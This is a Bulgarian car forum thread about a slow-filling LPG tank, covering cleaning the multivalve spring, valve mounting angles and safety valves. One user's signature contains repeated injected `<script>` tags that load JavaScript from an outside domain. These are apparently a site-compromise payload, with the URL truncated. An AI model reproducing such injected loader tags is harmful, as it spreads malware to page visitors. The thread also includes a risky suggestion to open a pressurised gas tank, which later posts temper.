Газовата зарежда бавноw124, 230E
Започната от Subsonic, 27 фев 2009 - 15:16:08
11 мнения по тази тема
Публикувано 27 февруари 2009 - 15:16
Здравейте,
От известно време газовата ми уредба зарежда много бавно. 20 литра се зареждат за 5 минути, а ако трябва да пълня цялата бутилка (80л. номинален обем/65 л. използваем) направо се образува опашка на колонката зад мен. При достигане на 80% капацитет, мултиклапана затваря и зареждането спира, но иначе дори и на празна бутилка е много бавно.
Зареждачката е сменяна, по друга причина, но нямаше промяна в скоростта на пълнене.
Подозирам че мултиклапана трябва да се свали и почисти, с което почти отиваме към нов, като се има предвид цялата занимавка по сваляне, слагане и херметизиране на съединениеята от зареждачакта към бутилката и от бутилката към мотора.
Ако някой е среащал подобен проблем, да сподели.
От известно време газовата ми уредба зарежда много бавно. 20 литра се зареждат за 5 минути, а ако трябва да пълня цялата бутилка (80л. номинален обем/65 л. използваем) направо се образува опашка на колонката зад мен. При достигане на 80% капацитет, мултиклапана затваря и зареждането спира, но иначе дори и на празна бутилка е много бавно.
Зареждачката е сменяна, по друга причина, но нямаше промяна в скоростта на пълнене.
Подозирам че мултиклапана трябва да се свали и почисти, с което почти отиваме към нов, като се има предвид цялата занимавка по сваляне, слагане и херметизиране на съединениеята от зареждачакта към бутилката и от бутилката към мотора.
Публикувано 27 февруари 2009 - 17:25
Преди 3 дни правих подобно упражнение на Нексията.Изведнъж отказа да зарежда,т.е. зарежда ,но много бавно .Отидох на газчия и ми я оправиха за около 15 минути и 5 БГ лева !!! Процедурата е следната :Здравейте,
1.Развиват се болтовете на бутилката ,които са наредени в кръг около кранчетата за спиране на газта и датчика за количеството на газта.
2.Вади се цялата платка,заедно с поплавъка за нивото на газта,не се притеснявай газта си седи на дъното на бутилката,само на някой да не му скимне да запали цигара.
3.Клапанът,който ограничава пълненето на бутилката на 100 процента има една пружинка,която заяжда-оттам ти е проблема-почистваш я добре,слагаш всичко по обратния ред и си готов.
Успех !
Mercedes Benz W201 - The Last Action Hero
Публикувано 27 февруари 2009 - 18:00
Аз ли не разбрах правилно, или искаш да кажеш че сте отворили бутилката докато вътре е имало газ???
Публикувано 27 февруари 2009 - 18:27
Имах много интересна случка с газова бутилка на мястото на резервната гума: от вибрациите вентила се беше ЗАВИЛ и не пускаше газ в бутилката.
Както е казано по-горе от колегата - отсекателя (така го знам аз) вътре в бутилката може да се заклини в положение, в което да пуска малък дебит навътре. Това в повечето случаи може да се разбере като се види стрелката за пълнотата на бутилката.
Както е казано по-горе от колегата - отсекателя (така го знам аз) вътре в бутилката може да се заклини в положение, в което да пуска малък дебит навътре. Това в повечето случаи може да се разбере като се види стрелката за пълнотата на бутилката.
Публикувано 27 февруари 2009 - 19:10
При отваряне на бутилката излиза газта в газообразно състояние ,газта на дъното на бутилката е втечнена и можеш спокойно да си извадиш поплавъка. Правилно си ме разбрал- може да се отвори и когато има газ в бутилката. И на мен ми изглеждаше странно ,докато не я отвориха пред очите ми.Аз ли не разбрах правилно, или искаш да кажеш че сте отворили бутилката докато вътре е имало газ???
Публикувано 27 февруари 2009 - 19:44
При отваряне на бутилката излиза газта в газообразно състояние ,газта на дъното на бутилката е втечнена и можеш спокойно да си извадиш поплавъка. Правилно си ме разбрал- може да се отвори и когато има газ в бутилката. И на мен ми изглеждаше странно ,докато не я отвориха пред очите ми.
Благодаря за инфото - ще махна мултиклапана да разгледам механизма и да почистя тая пружина.
Иначе тази течност на дъното на бутилката при нормално налягане май не е LPG, а някакви другa фракция която се събира с времето. Казват че било полезно да се почиства.
Публикувано 27 февруари 2009 - 21:01
LPG е течността и се пази от нея че е изгарящо-студена.Благодаря за инфото - ще махна мултиклапана да разгледам механизма и да почистя тая пружина.
Иначе тази течност на дъното на бутилката при нормално налягане май не е LPG, а някакви другa фракция която се събира с времето. Казват че било полезно да се почиства.
Публикувано 27 февруари 2009 - 23:29
LPG е течността и се пази от нея че е изгарящо-студена.
За изгарящото-измръзване знам - една седмица ходих с поизтръпнала ръка преди месец
Ама все си мисля че това като течност в бутилката е било я бензол, я нафталин, я някакви смолисти съединения.
Пропанът се изпарява при -40С, подложен на 1 бар абсолютно. Бутанът тръгва от нулата при атмосферно налягане, ама сега зимната смес по стандарт е 70%пропан/30% бутан и би трябвало на отворена бутилка да не седи като течност.
Ще отворим и ще видим - кой знае каква тиня имам по дъното и на моята бутилка
Публикувано 28 февруари 2009 - 10:05
Течността е пропан-бутан,няма никакви наслояваниия или боклуци.Ако се страхуваш да отвориш бутилката иди при газчия-работата е за 10-15 минути,н му кажи само този клапан да почисти и раздвижи. Не се правят никакви херметизирания или подобни упражнения.Ако си оставиш колата,като отидеш да я вземеш ще ти наговори,че ти е сменял куп неща за да ти вземе повече пари.За изгарящото-измръзване знам - една седмица ходих с поизтръпнала ръка преди месец
.
Ама все си мисля че това като течност в бутилката е било я бензол, я нафталин, я някакви смолисти съединения.
Пропанът се изпарява при -40С, подложен на 1 бар абсолютно. Бутанът тръгва от нулата при атмосферно налягане, ама сега зимната смес по стандарт е 70%пропан/30% бутан и би трябвало на отворена бутилка да не седи като течност.
Ще отворим и ще видим - кой знае каква тиня имам по дъното и на моята бутилка.
Публикувано 03 март 2009 - 13:33
И аз имам проблем със зареждането , но той се появява само зимата , лятото нямам никакъв проблем. Когато в ботилката има повече от 4-5 литра започва да зарежда бавно- примерно 10 литра за около 5-6 минути, а понякога се е случвало да влезе газ за 20-30 стотинки и до там.Когато е изцяло празна зарежда съвсем нормално. Този клапан за който говорите ми е BRC . И при вас ли е само зимата или през цялата година е така?
W201 M102.962 <script
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
<script SRC="http://Gheos.net/js/...2.js"></SCRIPT>
SRC="http://Gheos.net/js/...2.js"></SCRIPT>
Публикувано 03 март 2009 - 15:55
На Нексията тоя клапан ми е правил проблем 2 пъти за 3 години,предишната ми кола (Ситроен АХ) също имаше газова уредба и за близо 2,5 години нито веднъж не е засядал. По принцип веднъж в годината правя профилактика на газовата уредба - смяна на мембрани,чистене на изпарителя от гадориите,дето ги събира.Иначе не съм забелязал да има някаква разлика при пълненето на бутилката зимно и лятно време.И аз имам проблем със зареждането , но той се появява само зимата , лятото нямам никакъв проблем. Когато в ботилката има повече от 4-5 литра започва да зарежда бавно- примерно 10 литра за около 5-6 минути, а понякога се е случвало да влезе газ за 20-30 стотинки и до там.Когато е изцяло празна зарежда съвсем нормално. Този клапан за който говорите ми е BRC . И при вас ли е само зимата или през цялата година е така?
Публикувано 12 май 2009 - 15:11
Малко развитие по темата.
Оказа се че стария мулти-клапан (сонда) няма предпазен клапан за свръхналягане - това е клапана, който изпуска аварийно газ от бутилката в черната пластмасова кутия, в случай че по някаква причина налягането в бутилката е над някаква предварително зададена стойност.
От черната кутия около сондата, газта, която е по-тежка от въздуха се извежда под автомобила посредством гофрираните маркучи, които трябва да излизат извън купето на автомобила.
Излишно е да казвам че моите гофрирани маркучи не бяха изведени никъде, бутилката се оказа че е 65л. и с по-различен фланец (руски стандарт), на който не пасват италиянските пластмасови кутии. Старата кутия беше изрязвана дивашки и накриво, за да може да влезе фланеца.
В крайна сметка реших да сменя и бутилката, да сложа мулти-клапан с предпазен клапан (един болт с уплътнение и яка пружина), да монтирам стандартна пластмасова кутия, без да се налага да я преправям, изрязвам и т.н. , да изведа гофрираните маркучи, или поне единия, под колата и т.н.
Интересно наблюдение - ограничителя за 80% обем работи само когато мултиклапана е монтиран под подходящия монтажен ъгъл. Ако е 30градуса - 30 градуса, ако е за 90 градуса - 90 градуса, и ако е за 0 градуса - 0 градуса. Нивомера е като поплавък на тоалетно казанче и като стигне горно положение, изскача едно штифтче, което спира пълненето. Идеята е - нивомера да стигне края на хода си когато бутилката е около 80% пълна.
Ако 30 градусова сонда се монтира под ъгъл 0 градуса спрямо хоризонта, или дори 15 - бутилката си се пълни догоре и спира едва когато сработи ограничителя на газ-колонката. Това обяснва как съм успявал да събера 60-62л. в бутилка 65л. И като си представя колко пъти съм си карал спокойно с пълна догоре бутилка през лятото...
На всеки който иска да си смени или изчисти сондата мулти-клапан бих препоръчал да го направи при специалист. Дори когато бутилката е толкова празна, че колата не може празен ход да поддържа, а изгасва сама, в бутилката има още доста остатъчно налягане и в момента когато се сваля сондата, смърди та се не трае. Излишно е да казвам че такива процедури се правят на открито и проветриво място, никога на закрито, и никога в ниското. И никакви цигари...аз даже си откачих акумулатора, за всеки случай, че има една лампа която свети в багажника и ме беше страх от лош контакт и искри.
Оказа се че стария мулти-клапан (сонда) няма предпазен клапан за свръхналягане - това е клапана, който изпуска аварийно газ от бутилката в черната пластмасова кутия, в случай че по някаква причина налягането в бутилката е над някаква предварително зададена стойност.
От черната кутия около сондата, газта, която е по-тежка от въздуха се извежда под автомобила посредством гофрираните маркучи, които трябва да излизат извън купето на автомобила.
Излишно е да казвам че моите гофрирани маркучи не бяха изведени никъде, бутилката се оказа че е 65л. и с по-различен фланец (руски стандарт), на който не пасват италиянските пластмасови кутии. Старата кутия беше изрязвана дивашки и накриво, за да може да влезе фланеца.
В крайна сметка реших да сменя и бутилката, да сложа мулти-клапан с предпазен клапан (един болт с уплътнение и яка пружина), да монтирам стандартна пластмасова кутия, без да се налага да я преправям, изрязвам и т.н. , да изведа гофрираните маркучи, или поне единия, под колата и т.н.
Интересно наблюдение - ограничителя за 80% обем работи само когато мултиклапана е монтиран под подходящия монтажен ъгъл. Ако е 30градуса - 30 градуса, ако е за 90 градуса - 90 градуса, и ако е за 0 градуса - 0 градуса. Нивомера е като поплавък на тоалетно казанче и като стигне горно положение, изскача едно штифтче, което спира пълненето. Идеята е - нивомера да стигне края на хода си когато бутилката е около 80% пълна.
Ако 30 градусова сонда се монтира под ъгъл 0 градуса спрямо хоризонта, или дори 15 - бутилката си се пълни догоре и спира едва когато сработи ограничителя на газ-колонката. Това обяснва как съм успявал да събера 60-62л. в бутилка 65л. И като си представя колко пъти съм си карал спокойно с пълна догоре бутилка през лятото...
На всеки който иска да си смени или изчисти сондата мулти-клапан бих препоръчал да го направи при специалист. Дори когато бутилката е толкова празна, че колата не може празен ход да поддържа, а изгасва сама, в бутилката има още доста остатъчно налягане и в момента когато се сваля сондата, смърди та се не трае. Излишно е да казвам че такива процедури се правят на открито и проветриво място, никога на закрито, и никога в ниското. И никакви цигари...аз даже си откачих акумулатора, за всеки случай, че има една лампа която свети в багажника и ме беше страх от лош контакт и искри.
0 потребител(и) четат тази тема
0 потребители, 0 гости, 0 анонимни

Виж ГАРАЖА